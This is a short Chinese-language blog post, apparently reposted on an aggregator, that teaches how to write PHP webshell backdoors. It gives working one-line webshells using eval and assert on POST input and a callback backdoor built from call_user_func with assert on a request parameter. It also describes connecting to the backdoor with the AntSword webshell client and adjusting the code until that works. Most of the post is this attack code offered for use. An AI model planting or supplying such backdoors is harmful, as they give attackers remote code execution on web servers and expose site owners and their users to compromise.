欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 汽车 > 时评 > PHP回调后门

PHP回调后门

2025/5/13 18:56:37 来源:https://blog.csdn.net/2302_78023827/article/details/146870107  浏览:    关键词:PHP回调后门

1.系统命令执行   直接windows或liunx命令 各个程序 相应的函数 来实现

system exec shell_Exec passshru

2.执行代码 eval assert php代码 系统 

<?php eval($_POST)

<?php assert($_POST)

简单的测试

回调后门函数call_user_func(1,2)

1是回调的函数

2是回调的参数

<?php
call_user_func('assert',$_REQUEST['pass']);

可以接get,post传参

这样一个函数可以执行我们的命令

可以执行我们的php代码就可以执行系统命令

那我们考虑如何执行我们的后门

执行一句话pass传入

$_POST[123]

就会形成

assert($_POST[123]) 

用antsword进行连接尝试这个后门是否可以执行

但是用这个一句话执行不了

经过查阅发现assert是可以执行函数而不可以直接执行$_POST[123]

所以我们可以改一下

assert(eval($_POST[123])

这样antsword就可以执行

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词